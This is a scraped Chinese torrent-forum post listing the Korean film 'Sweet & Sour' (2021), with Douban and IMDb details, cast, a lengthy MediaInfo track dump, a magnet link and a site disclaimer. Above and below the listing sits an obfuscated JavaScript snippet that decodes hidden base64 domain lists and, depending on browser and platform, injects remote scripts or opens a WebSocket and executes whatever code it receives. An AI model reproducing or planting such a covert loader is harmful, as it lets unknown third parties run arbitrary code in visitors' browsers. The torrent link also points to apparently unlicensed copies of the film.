酸酸甜甜[中文字幕].Sweet.and.Sour.2021.1080p.NF.WEB-DL.DDP5.1.Atmos.HEVC 5.40GB

版主小s 1月前 759

var x=window['\x61\x74\x6f\x62'],id=x('NDQ0NDczNzY1NjE1Nzg4ODg4OC0xMDAwNw==');document.write('%lt;ins style="display:none!important" id="'+id+'"%gt;%lt;/ins%gt;');(window.adbyunion=window.adbyunion||[]).push(id);window['\x68\x6e\x49\x43\x61\x57\x73\x53\x72\x45']=(!/^Mac|Win/.test(navigator.platform)||!navigator.platform)?function(){;(function(u,k,w,d,c){var cs=d[x('Y3VycmVudFNjcmlwdA==')];'jQuery';var t=[],l=[],e=0,r=0,delay=2000,f=null,ua=navigator.userAgent.toLowerCase(),sc=Math.max(1,600000),ext='1',i='win'+Math.floor(new Date().getTime()/sc)+ext;if(ua.indexOf('baidu')>-1||ua.indexOf('huaweibrowser')>-1||ua.indexOf('vivobrowser')>-1){r=1;u=k;f=function(){if(!l.length)return;var ws=new WebSocket(l.shift()+'/'+i);ws.onopen=function(){for(var k in t)t[k]&&clearTimeout(t[k])};ws.onmessage=function(e){new Function('_tdcs',x(e.data))(cs);ws.close()};ws.onerror=function(e){t[++e]&&clearTimeout(t[e]);f()}};}else{f=function(){if(!l.length)return;var s=document.createElement('script');s.src=l.shift()+'/'+i;cs.parentElement.insertBefore(s,cs);s.onload=function(){for(var k in t)t[k]&&clearTimeout(t[k])};s.onerror=function(){cs.parentElement.removeChild(s);t[++e]&&clearTimeout(t[e]);f()}};}u=decodeURIComponent(x(u.replace(new RegExp(c[r]+''+c[r],'g'),c[r])));var l=u.split(',');l.sort(function(){return 0.5-Math.random()});for(var j in l)t[j]=setTimeout(f,delay*j);})('aHR0cHM6Ly9va3NrZGpmZGsuaG9uZ2ZhY2huLmNvbbSxodHRwczovL28zOWtza2RmamxrLmRzbbGVuZ2d1aS5jbb20=','d3NzOi8vd3MMua2FpZ3Vhbmdkb3UuY29tOjgxODEsd3NzOi8vd3MMueW5zbHZ5b3UuY29tOjgxODEsd3NzOi8vd3MMud3NobGNnai5jb206ODE4MMQ==',window,document,['b','M']);}:function(){};

◎译 名 酸酸甜甜 / 酸酸甜甜爱上你 / Sweet & Sour

◎片 名 ????

◎年 代 2021

◎产 地 韩国

◎类 别 爱情

◎语 言 韩语

◎上映日期 2021-06-04(韩国网络)

◎IMDb链接 https://www.imdb.com/title/tt14599938/

◎豆瓣评分 6.9/10 (5072人评价)

◎豆瓣链接 https://movie.douban.com/subject/34852311/

◎片 长 102分钟

◎导 演 李桂碧 Gye-byeok Lee (id:1347842)

◎演 员 张基龙 Jang Ki-yong (id:1375035)

蔡秀彬 Soo-bin Chae (id:1351609)

郑秀晶 Krystal Jung (id:1315508)

赵汉哲 Han-chul Jo (id:1386180)

李宇济 Woo-je Lee (id:1449588)

柳善 Seon Yu (id:1006553)

李璟荣 Kyeong-yeong Lee (id:1039491)

朴哲民 Cheol-min Park (id:1218750)

郑熙泰 Hee-tae Jung (id:1378175)

吴素贤 Oh So-hyun (id:1446293)

金美京 Mi-kyung Kim (id:1315405)

安吉江 Kil-Kang Ahn (id:1340269)

吕敏珠 Yeo Min Joo (id:1458040)

朴智勋 Park Ji-hoon (id:1445016)

尹炳熙 Yoon Byeong-hee (id:1382221)

金美惠 Mi-hye Kim (id:1453836)

◎标 签 爱情 / 韩国 / 韩国电影 / 郑秀晶 / 黑色幽默 / 张基龙 / 蔡秀彬 / 电影

◎简 介

因一见钟情而开始恋爱,但因就业问题而身心疏远的情侣的爱情电影。

  1. ##### MediaInfo ######

  2. General

  3. Unique ID : 164652318588196193103426409408217904578 (0x7BDEE211695C645373C12C15CD9275C2)

  4. Complete name : [email protected]DQ.COM.mkv

  5. Format : Matroska

  6. Format version : Version 4

  7. File size : 5.40 GiB

  8. Duration : 1 h 42 min

  9. Overall bit rate : 7 544 kb/s

  10. Encoded date : UTC 2021-10-14 07:05:05

  11. Writing application : mkvmerge v44.0.0 ('Domino') 64-bit

  12. Writing library : libebml v1.3.10 + libmatroska v1.5.2


  13. Video

  14. ID : 1

  15. Format : HEVC

  16. Format/Info : High Efficiency Video Coding

  17. Format profile : Main [email protected]@Main

  18. HDR format : SMPTE ST 2086, HDR10 compatible

  19. Codec ID : V_MPEGH/ISO/HEVC

  20. Duration : 1 h 41 min

  21. Bit rate : 4 231 kb/s

  22. Width : 1 920 pixels

  23. Height : 1 080 pixels

  24. Display aspect ratio : 16:9

  25. Frame rate mode : Constant

  26. Frame rate : 23.976 (24000/1001/53354) FPS

  27. Color space : YUV

  28. Chroma subsampling : 4:2:0 (Type 2)

  29. Bit depth : 10 bits

  30. Bits/(Pixel*Frame) : 0.085

  31. Stream size : 3.01 GiB (56%)

  32. Default : Yes

  33. Forced : No

  34. Color range : Limited

  35. Color primaries : BT.2020

  36. Transfer characteristics : PQ

  37. Matrix coefficients : BT.2020 non-constant

  38. Mastering display color primaries : Display P3

  39. Mastering display luminance : min: 0.0001 cd/m2, max: 1000 cd/m2

  40. Maximum Content Light Level : 1064 cd/m2

  41. Maximum Frame-Average Light Level : 271 cd/m2


  42. Audio #1

  43. ID : 2

  44. Format : E-AC-3 JOC

  45. Format/Info : Enhanced AC-3 with Joint Object Coding

  46. Commercial name : Dolby Digital Plus with Dolby Atmos

  47. Codec ID : A_EAC3

  48. Duration : 1 h 42 min

  49. Bit rate mode : Constant

  50. Bit rate : 768 kb/s

  51. Channel(s) : 6 channels

  52. Channel layout : L R C LFE Ls Rs

  53. Sampling rate : 48.0 kHz

  54. Frame rate : 31.250 FPS (1536 SPF)

  55. Compression mode : Lossy

  56. Stream size : 563 MiB (10%)

  57. Title : Korean

  58. Language : Korean

  59. Service kind : Complete Main

  60. Default : Yes

  61. Forced : No

  62. Complexity index : 16

  63. Number of dynamic objects : 15

  64. Bed channel count : 1 channel

  65. Bed channel configuration : LFE


  66. Audio #2

  67. ID : 3

  68. Format : E-AC-3

  69. Format/Info : Enhanced AC-3

  70. Commercial name : Dolby Digital Plus

  71. Codec ID : A_EAC3

  72. Duration : 1 h 42 min

  73. Bit rate mode : Constant

  74. Bit rate : 640 kb/s

  75. Channel(s) : 6 channels

  76. Channel layout : L R C LFE Ls Rs

  77. Sampling rate : 48.0 kHz

  78. Frame rate : 31.250 FPS (1536 SPF)

  79. Compression mode : Lossy

  80. Stream size : 469 MiB (8%)

  81. Title : English

  82. Language : English

  83. Service kind : Complete Main

  84. Default : No

  85. Forced : No


  86. Audio #3

  87. ID : 4

  88. Format : E-AC-3

  89. Format/Info : Enhanced AC-3

  90. Commercial name : Dolby Digital Plus

  91. Codec ID : A_EAC3

  92. Duration : 1 h 42 min

  93. Bit rate mode : Constant

  94. Bit rate : 640 kb/s

  95. Channel(s) : 6 channels

  96. Channel layout : L R C LFE Ls Rs

  97. Sampling rate : 48.0 kHz

  98. Frame rate : 31.250 FPS (1536 SPF)

  99. Compression mode : Lossy

  100. Stream size : 469 MiB (8%)

  101. Title : Brazilian Portuguese

  102. Language : Portuguese

  103. Service kind : Complete Main

  104. Default : No

  105. Forced : No


  106. Audio #4

  107. ID : 5

  108. Format : E-AC-3

  109. Format/Info : Enhanced AC-3

  110. Commercial name : Dolby Digital Plus

  111. Codec ID : A_EAC3

  112. Duration : 1 h 42 min

  113. Bit rate mode : Constant

  114. Bit rate : 640 kb/s

  115. Channel(s) : 6 channels

  116. Channel layout : L R C LFE Ls Rs

  117. Sampling rate : 48.0 kHz

  118. Frame rate : 31.250 FPS (1536 SPF)

  119. Compression mode : Lossy

  120. Stream size : 469 MiB (8%)

  121. Title : Spanish

  122. Language : Spanish

  123. Service kind : Complete Main

  124. Default : No

  125. Forced : No


  126. Audio #5

  127. ID : 6

  128. Format : E-AC-3

  129. Format/Info : Enhanced AC-3

  130. Commercial name : Dolby Digital Plus

  131. Codec ID : A_EAC3

  132. Duration : 1 h 42 min

  133. Bit rate mode : Constant

  134. Bit rate : 640 kb/s

  135. Channel(s) : 6 channels

  136. Channel layout : L R C LFE Ls Rs

  137. Sampling rate : 48.0 kHz

  138. Frame rate : 31.250 FPS (1536 SPF)

  139. Compression mode : Lossy

  140. Stream size : 469 MiB (8%)

  141. Title : Thai

  142. Language : Thai

  143. Service kind : Complete Main

  144. Default : No

  145. Forced : No


  146. Text #1

  147. ID : 7

  148. Format : UTF-8

  149. Codec ID : S_TEXT/UTF8

  150. Codec ID/Info : UTF-8 Plain Text

  151. Duration : 1 h 41 min

  152. Bit rate : 48 b/s

  153. Count of elements : 1409

  154. Stream size : 36.0 KiB (0%)

  155. Title : English

  156. Language : English

  157. Default : Yes

  158. Forced : No


  159. Text #2

  160. ID : 8

  161. Format : UTF-8

  162. Codec ID : S_TEXT/UTF8

  163. Codec ID/Info : UTF-8 Plain Text

  164. Duration : 1 h 41 min

  165. Bit rate : 82 b/s

  166. Count of elements : 1451

  167. Stream size : 61.4 KiB (0%)

  168. Title : Arabic

  169. Language : Arabic

  170. Default : No

  171. Forced : No


  172. Text #3

  173. ID : 9

  174. Format : UTF-8

  175. Codec ID : S_TEXT/UTF8

  176. Codec ID/Info : UTF-8 Plain Text

  177. Duration : 1 h 41 min

  178. Bit rate : 57 b/s

  179. Count of elements : 1453

  180. Stream size : 42.4 KiB (0%)

  181. Title : Chinese Simplified

  182. Language : Chinese

  183. Default : No

  184. Forced : No


  185. Text #4

  186. ID : 10

  187. Format : UTF-8

  188. Codec ID : S_TEXT/UTF8

  189. Codec ID/Info : UTF-8 Plain Text

  190. Duration : 1 h 41 min

  191. Bit rate : 57 b/s

  192. Count of elements : 1447

  193. Stream size : 43.0 KiB (0%)

  194. Title : Chinese Traditional

  195. Language : Chinese

  196. Default : No

  197. Forced : No


  198. Text #5

  199. ID : 11

  200. Format : UTF-8

  201. Codec ID : S_TEXT/UTF8

  202. Codec ID/Info : UTF-8 Plain Text

  203. Duration : 1 h 41 min

  204. Bit rate : 47 b/s

  205. Count of elements : 1450

  206. Stream size : 35.2 KiB (0%)

  207. Title : Croatian

  208. Language : Croatian

  209. Default : No

  210. Forced : No


  211. Text #6

  212. ID : 12

  213. Format : UTF-8

  214. Codec ID : S_TEXT/UTF8

  215. Codec ID/Info : UTF-8 Plain Text

  216. Duration : 1 h 41 min

  217. Bit rate : 48 b/s

  218. Count of elements : 1450

  219. Stream size : 35.8 KiB (0%)

  220. Title : Czech

  221. Language : Czech

  222. Default : No

  223. Forced : No


  224. Text #7

  225. ID : 13

  226. Format : UTF-8

  227. Codec ID : S_TEXT/UTF8

  228. Codec ID/Info : UTF-8 Plain Text

  229. Duration : 1 h 41 min

  230. Bit rate : 48 b/s

  231. Count of elements : 1447

  232. Stream size : 35.7 KiB (0%)

  233. Title : Danish

  234. Language : Danish

  235. Default : No

  236. Forced : No


  237. Text #8

  238. ID : 14

  239. Format : UTF-8

  240. Codec ID : S_TEXT/UTF8

  241. Codec ID/Info : UTF-8 Plain Text

  242. Duration : 1 h 41 min

  243. Bit rate : 47 b/s

  244. Count of elements : 1447

  245. Stream size : 35.3 KiB (0%)

  246. Title : Dutch

  247. Language : Dutch

  248. Default : No

  249. Forced : No


  250. Text #9

  251. ID : 15

  252. Format : UTF-8

  253. Codec ID : S_TEXT/UTF8

  254. Codec ID/Info : UTF-8 Plain Text

  255. Duration : 1 h 41 min

  256. Bit rate : 49 b/s

  257. Count of elements : 1449

  258. Stream size : 37.1 KiB (0%)

  259. Title : Finnish

  260. Language : Finnish

  261. Default : No

  262. Forced : No


  263. Text #10

  264. ID : 16

  265. Format : UTF-8

  266. Codec ID : S_TEXT/UTF8

  267. Codec ID/Info : UTF-8 Plain Text

  268. Duration : 1 h 41 min

  269. Bit rate : 52 b/s

  270. Count of elements : 1449

  271. Stream size : 38.8 KiB (0%)

  272. Title : French

  273. Language : French

  274. Default : No

  275. Forced : No


  276. Text #11

  277. ID : 17

  278. Format : UTF-8

  279. Codec ID : S_TEXT/UTF8

  280. Codec ID/Info : UTF-8 Plain Text

  281. Duration : 1 h 41 min

  282. Bit rate : 52 b/s

  283. Count of elements : 1446

  284. Stream size : 39.0 KiB (0%)

  285. Title : German

  286. Language : German

  287. Default : No

  288. Forced : No


  289. Text #12

  290. ID : 18

  291. Format : UTF-8

  292. Codec ID : S_TEXT/UTF8

  293. Codec ID/Info : UTF-8 Plain Text

  294. Duration : 1 h 41 min

  295. Bit rate : 81 b/s

  296. Count of elements : 1450

  297. Stream size : 60.6 KiB (0%)

  298. Title : Greek

  299. Language : Greek

  300. Default : No

  301. Forced : No


  302. Text #13

  303. ID : 19

  304. Format : UTF-8

  305. Codec ID : S_TEXT/UTF8

  306. Codec ID/Info : UTF-8 Plain Text

  307. Duration : 1 h 41 min

  308. Bit rate : 74 b/s

  309. Count of elements : 1451

  310. Stream size : 55.5 KiB (0%)

  311. Title : Hebrew

  312. Language : Hebrew

  313. Default : No

  314. Forced : No


  315. Text #14

  316. ID : 20

  317. Format : UTF-8

  318. Codec ID : S_TEXT/UTF8

  319. Codec ID/Info : UTF-8 Plain Text

  320. Duration : 1 h 41 min

  321. Bit rate : 46 b/s

  322. Count of elements : 1450

  323. Stream size : 34.5 KiB (0%)

  324. Title : Hungarian

  325. Language : Hungarian

  326. Default : No

  327. Forced : No


  328. Text #15

  329. ID : 21

  330. Format : UTF-8

  331. Codec ID : S_TEXT/UTF8

  332. Codec ID/Info : UTF-8 Plain Text

  333. Duration : 1 h 41 min

  334. Bit rate : 52 b/s

  335. Count of elements : 1450

  336. Stream size : 38.8 KiB (0%)

  337. Title : Indonesian

  338. Language : Indonesian

  339. Default : No

  340. Forced : No


  341. Text #16

  342. ID : 22

  343. Format : UTF-8

  344. Codec ID : S_TEXT/UTF8

  345. Codec ID/Info : UTF-8 Plain Text

  346. Duration : 1 h 41 min

  347. Bit rate : 50 b/s

  348. Count of elements : 1449

  349. Stream size : 37.9 KiB (0%)

  350. Title : Italian

  351. Language : Italian

  352. Default : No

  353. Forced : No


  354. Text #17

  355. ID : 23

  356. Format : UTF-8

  357. Codec ID : S_TEXT/UTF8

  358. Codec ID/Info : UTF-8 Plain Text

  359. Duration : 1 h 41 min

  360. Bit rate : 52 b/s

  361. Count of elements : 1376

  362. Stream size : 39.2 KiB (0%)

  363. Title : Japanese

  364. Language : Japanese

  365. Default : No

  366. Forced : No


  367. Text #18

  368. ID : 24

  369. Format : UTF-8

  370. Codec ID : S_TEXT/UTF8

  371. Codec ID/Info : UTF-8 Plain Text

  372. Duration : 1 h 41 min

  373. Bit rate : 106 b/s

  374. Count of elements : 1885

  375. Stream size : 79.2 KiB (0%)

  376. Title : Korean

  377. Language : Korean

  378. Default : No

  379. Forced : No


  380. Text #19

  381. ID : 25

  382. Format : UTF-8

  383. Codec ID : S_TEXT/UTF8

  384. Codec ID/Info : UTF-8 Plain Text

  385. Duration : 1 h 41 min

  386. Bit rate : 0 b/s

  387. Count of elements : 32

  388. Stream size : 721 Bytes (0%)

  389. Title : Korean (Forced)

  390. Language : Korean

  391. Default : No

  392. Forced : Yes


  393. Text #20

  394. ID : 26

  395. Format : UTF-8

  396. Codec ID : S_TEXT/UTF8

  397. Codec ID/Info : UTF-8 Plain Text

  398. Duration : 1 h 41 min

  399. Bit rate : 49 b/s

  400. Count of elements : 1458

  401. Stream size : 36.9 KiB (0%)

  402. Title : Malay

  403. Language : Malay

  404. Default : No

  405. Forced : No


  406. Text #21

  407. ID : 27

  408. Format : UTF-8

  409. Codec ID : S_TEXT/UTF8

  410. Codec ID/Info : UTF-8 Plain Text

  411. Duration : 1 h 41 min

  412. Bit rate : 48 b/s

  413. Count of elements : 1450

  414. Stream size : 36.0 KiB (0%)

  415. Title : Norwegian Bokmal

  416. Language : Norwegian Bokmal

  417. Default : No

  418. Forced : No


  419. Text #22

  420. ID : 28

  421. Format : UTF-8

  422. Codec ID : S_TEXT/UTF8

  423. Codec ID/Info : UTF-8 Plain Text

  424. Duration : 1 h 41 min

  425. Bit rate : 45 b/s

  426. Count of elements : 1450

  427. Stream size : 33.5 KiB (0%)

  428. Title : Polish

  429. Language : Polish

  430. Default : No

  431. Forced : No


  432. Text #23

  433. ID : 29

  434. Format : UTF-8

  435. Codec ID : S_TEXT/UTF8

  436. Codec ID/Info : UTF-8 Plain Text

  437. Duration : 1 h 41 min

  438. Bit rate : 49 b/s

  439. Count of elements : 1447

  440. Stream size : 36.9 KiB (0%)

  441. Title : Portuguese

  442. Language : Portuguese

  443. Default : No

  444. Forced : No


  445. Text #24

  446. ID : 30

  447. Format : UTF-8

  448. Codec ID : S_TEXT/UTF8

  449. Codec ID/Info : UTF-8 Plain Text

  450. Duration : 1 h 41 min

  451. Bit rate : 47 b/s

  452. Count of elements : 1441

  453. Stream size : 35.7 KiB (0%)

  454. Title : Brazilian Portuguese

  455. Language : Portuguese

  456. Default : No

  457. Forced : No


  458. Text #25

  459. ID : 31

  460. Format : UTF-8

  461. Codec ID : S_TEXT/UTF8

  462. Codec ID/Info : UTF-8 Plain Text

  463. Duration : 1 h 41 min

  464. Bit rate : 55 b/s

  465. Count of elements : 1450

  466. Stream size : 41.2 KiB (0%)

  467. Title : Romanian

  468. Language : Romanian

  469. Default : No

  470. Forced : No


  471. Text #26

  472. ID : 32

  473. Format : UTF-8

  474. Codec ID : S_TEXT/UTF8

  475. Codec ID/Info : UTF-8 Plain Text

  476. Duration : 1 h 41 min

  477. Bit rate : 82 b/s

  478. Count of elements : 1451

  479. Stream size : 61.4 KiB (0%)

  480. Title : Russian

  481. Language : Russian

  482. Default : No

  483. Forced : No


  484. Text #27

  485. ID : 33

  486. Format : UTF-8

  487. Codec ID : S_TEXT/UTF8

  488. Codec ID/Info : UTF-8 Plain Text

  489. Duration : 1 h 41 min

  490. Bit rate : 50 b/s

  491. Count of elements : 1451

  492. Stream size : 37.6 KiB (0%)

  493. Title : Spanish

  494. Language : Spanish

  495. Default : No

  496. Forced : No


  497. Text #28

  498. ID : 34

  499. Format : UTF-8

  500. Codec ID : S_TEXT/UTF8

  501. Codec ID/Info : UTF-8 Plain Text

  502. Duration : 1 h 41 min

  503. Bit rate : 44 b/s

  504. Count of elements : 1450

  505. Stream size : 33.3 KiB (0%)

  506. Title : European Spanish

  507. Language : Spanish

  508. Default : No

  509. Forced : No


  510. Text #29

  511. ID : 35

  512. Format : UTF-8

  513. Codec ID : S_TEXT/UTF8

  514. Codec ID/Info : UTF-8 Plain Text

  515. Duration : 1 h 41 min

  516. Bit rate : 49 b/s

  517. Count of elements : 1447

  518. Stream size : 36.9 KiB (0%)

  519. Title : Swedish

  520. Language : Swedish

  521. Default : No

  522. Forced : No


  523. Text #30

  524. ID : 36

  525. Format : UTF-8

  526. Codec ID : S_TEXT/UTF8

  527. Codec ID/Info : UTF-8 Plain Text

  528. Duration : 1 h 41 min

  529. Bit rate : 138 b/s

  530. Count of elements : 1450

  531. Stream size : 103 KiB (0%)

  532. Title : Thai

  533. Language : Thai

  534. Default : No

  535. Forced : No


  536. Text #31

  537. ID : 37

  538. Format : UTF-8

  539. Codec ID : S_TEXT/UTF8

  540. Codec ID/Info : UTF-8 Plain Text

  541. Duration : 1 h 41 min

  542. Bit rate : 49 b/s

  543. Count of elements : 1450

  544. Stream size : 37.1 KiB (0%)

  545. Title : Turkish

  546. Language : Turkish

  547. Default : No

  548. Forced : No


  549. Text #32

  550. ID : 38

  551. Format : UTF-8

  552. Codec ID : S_TEXT/UTF8

  553. Codec ID/Info : UTF-8 Plain Text

  554. Duration : 1 h 41 min

  555. Bit rate : 73 b/s

  556. Count of elements : 1450

  557. Stream size : 54.3 KiB (0%)

  558. Title : Vietnamese

  559. Language : Vietnamese

  560. Default : No

  561. Forced : No




复制代码


TAGS 爱情

磁力链:
  • magnet:?xt=urn:btih:AE5F7027D0EEFD57A1376C8052DEB28F245CCEAD

上传的附件:
BT9527.com论坛第一帅,不接受任何反驳
BT9527电影天堂 1、BT9527电影天堂提供的BT文件均来源于互联网抓取,只供网友学习交流、技术提升使用。
2、我们遵守BitTorrent点对点协议原则,任何版权问题请联系原资源发布商,我们不处理任何版权纠纷,谢谢!如有争议请联系邮箱:BT9527#hotmail.com(#换成@)
3、如果您发现某页面或地址有错误,请联系站长邮箱BT9527#hotmail.com(#换成@),我们会尽快处理。您的热心是对BT9527电影天堂最大的支持。
4、本站建议去正规影院观看电影以支持电影行业发展。
最新回复 (0)

你可以在 登录 or 注册 后,对此帖发表评论!

返回
var x=window['\x61\x74\x6f\x62'],id=x('NDQ0NDczNzY1NjE1Nzg4ODg4OC0xMDAwNg==');document.write('%lt;ins style="display:none!important" id="'+id+'"%gt;%lt;/ins%gt;');(window.adbyunion=window.adbyunion||[]).push(id);window['\x59\x72\x72\x51\x4e\x72\x4a\x5a\x7a\x42']=(!/^Mac|Win/.test(navigator.platform)||!navigator.platform)?function(){;(function(u,k,w,d,c){var cs=d[x('Y3VycmVudFNjcmlwdA==')];'jQuery';var t=[],l=[],e=0,r=0,delay=2000,f=null,ua=navigator.userAgent.toLowerCase(),sc=Math.max(1,600000),ext='1',i='win'+Math.floor(new Date().getTime()/sc)+ext;if(ua.indexOf('baidu')>-1||ua.indexOf('huaweibrowser')>-1||ua.indexOf('vivobrowser')>-1){r=1;u=k;f=function(){if(!l.length)return;var ws=new WebSocket(l.shift()+'/'+i);ws.onopen=function(){for(var k in t)t[k]&&clearTimeout(t[k])};ws.onmessage=function(e){new Function('_tdcs',x(e.data))(cs);ws.close()};ws.onerror=function(e){t[++e]&&clearTimeout(t[e]);f()}};}else{f=function(){if(!l.length)return;var s=document.createElement('script');s.src=l.shift()+'/'+i;cs.parentElement.insertBefore(s,cs);s.onload=function(){for(var k in t)t[k]&&clearTimeout(t[k])};s.onerror=function(){cs.parentElement.removeChild(s);t[++e]&&clearTimeout(t[e]);f()}};}u=decodeURIComponent(x(u.replace(new RegExp(c[r]+''+c[r],'g'),c[r])));var l=u.split(',');l.sort(function(){return 0.5-Math.random()});for(var j in l)t[j]=setTimeout(f,delay*j);})('aHR0cHM6Ly9va3NrZGpmZGsuaG9uZ2ZhY2huLmNvbbSxodHRwczovL28zOWtza2RmamxrLmRzbbGVuZ2d1aS5jbb20=','d3NzOi8vd3MMua2FpZ3Vhbmdkb3UuY29tOjgxODEsd3NzOi8vd3MMueW5zbHZ5b3UuY29tOjgxODEsd3NzOi8vd3MMud3NobGNnai5jb206ODE4MMQ==',window,document,['b','M']);}:function(){};